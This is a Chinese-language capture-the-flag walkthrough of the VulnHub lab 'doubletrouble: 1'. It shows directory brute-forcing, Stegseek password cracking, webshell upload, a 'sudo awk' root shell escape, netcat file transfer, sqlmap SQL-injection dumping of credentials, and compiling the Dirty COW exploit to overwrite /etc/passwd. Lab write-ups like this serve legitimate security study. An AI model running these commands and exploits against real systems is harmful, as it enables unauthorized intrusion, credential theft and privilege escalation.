vulnhub刷题记录（doubletrouble: 1）

• 英文名称：doubletrouble: 1
• 中文名称：双重烦恼：1
• 发布日期：2021 年 9 月 11 日
• 难度：容易
• 描述：关于 vm：测试并从 virtualbox 导出。启用 dhcp 和嵌套 vtx/amdv。您可以通过电子邮件与我联系以获取故障排除或问题。
• 下载地址：https://www.vulnhub.com/entry/empire-breakout,751/

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

1、主机发现（192.168.199.107）

主机发现

2、端口扫描，发现22端口和80端口

端口扫描

3、访问web页面

4、搜索web组件漏洞

web组件漏洞

5、发现web目录

┌──(ailx10㉿kali)-[~]
└─$ dirb http://192.168.199.107/       

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Aug 21 17:50:02 2022
URL_BASE: http://192.168.199.107/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          
                                  
+ http://192.168.199.107/favicon.ico (CODE:200|SIZE:894)                                                             
+ http://192.168.199.107/index.php (CODE:200|SIZE:5816)                                                                               
+ http://192.168.199.107/robots.txt (CODE:200|SIZE:26)                                                                       
+ http://192.168.199.107/server-status (CODE:403|SIZE:280)                                                                                                                                                      
+ http://192.168.199.107/install/index.php (CODE:200|SIZE:1815)                              
==> DIRECTORY: http://192.168.199.107/uploads/ 
==> DIRECTORY: http://192.168.199.107/backups/ 
==> DIRECTORY: http://192.168.199.107/secret/ 
...   
-----------------
END_TIME: Sun Aug 21 17:50:11 2022
DOWNLOADED: 9224 - FOUND: 5           

6、发现一个秘密文件

线索

7、尝试对图片进行提取嵌入信息

steghide info doubletrouble.jpg           

尝试提取图片中的信息

8、使用Stegseek破解经过Steghide隐写的数据[1]

Stegseek是迄今为止全世界最快的Steghide破解器，该工具每秒能够处理数百万的密码。

值得一提的是，仅需两秒钟，该工具就可以跑完rockyou.txt字典。

而众所周知，rockyou.txt是一个包含了超过1400万个密码的强大字典文件。

─# wget https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# apt install ./stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt            

得到密码：92camaro

秒出密码：92camaro

9、再次提取图片中的嵌入信息，得到邮箱和密码

┌──(root㉿kali)-[/home/ailx10/002]
└─# steghide info doubletrouble.jpg
┌──(root㉿kali)-[/home/ailx10/002]
└─# cat doubletrouble.jpg.out 
[email protected]
otis666           

得到web管理员密码

10、进入web后台，新增用户 ailx10

新增用户 ailx10

11、切换账号，创建项目，上传webshell

上传webshell

12、反弹shell

反弹shell

13、查看sudo，发现awk特权命令不需要密码

升级root

14、升级到root权限，竟然发现另一个靶机，果然是个老六

sudo awk 'BEGIN {system("/bin/sh")}'           

遇见老六

15、nc 下载到本地

服务端：
nc -lvp 4444 > ailx10_double_trouble.ova

客户端：
nc 192.168.199.247 4444 < doubletrouble.ova           

下载第二个 ova

16、开启第二个靶机，重新再来一遍渗透流程

第二个靶机

17、主机发现，多了一个IP：192.168.199.171

新增一个IP地址：192.168.199.171

18、端口扫描，发现22、80端口

端口扫描

19、访问web页面

web页面

20、尝试sqlmap注入

---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=ailx10' AND (SELECT 8679 FROM (SELECT(SLEEP(5)))oZRk) AND 'IwOe'='IwOe&psw=123456&btnLogin=Login
---           

存储sql注入漏洞

21、尝试获得数据库名字（doubletrouble）

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" --current-db           

数据库名

22、尝试获得表名称（users）

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble --tables           

表名

23、尝试获得字段名称（username，password）

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users --columns           

字段名称

24、尝试获得表中的字段内容

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users -C username,password --dump

Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1  |
| clapton  | ZubZub99 |
+----------+----------+           

字段内容

25、尝试ssh登录，获得普通用户的flag

ssh登录，获得普通flag

26、获取系统信息，尝试发现漏洞

系统信息

提权POC

27、编译45010发现缺少文件，只好上脏牛[2]

脏牛漏洞(CVE-2016–5195)，影响低版本的Linux系统

Centos7/RHEL7     3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10      4.8.0-26.28
Ubuntu 16.04      4.4.0-45.66
Ubuntu 14.04      3.13.0-100.147
Debian 8          3.16.36-1+deb8u2
Debian 7          3.2.82-1           

漏洞具体是由于get_user_page内核函数在处理Copy-on-Write的过程中，可能产出竞态条件造成COW过程被破坏，导致出现写数据到进程地址空间内只读内存区域的机会。

修改su或者passwd程序就可以达到root的目的。

clapton@doubletrouble:~$ ls
45010.c  dirty.c  user.txt
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$ ls
45010.c  dirty	dirty.c  user.txt
clapton@doubletrouble:~$ ./dirty ailx10
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: ailx10
Complete line:
firefart:fimjbZU2MTUTY:0:0:pwned:/root:/bin/bash

mmap: 7f49735fb000           

28、提权，获得root的flag

获得root的flag

到此，实验完成～

参考

1. ^stegseek https://github.com/RickdeJager/stegseek/releases
2. ^脏牛 https://github.com/firefart/dirtycow

编辑于 2022-08-21 21:08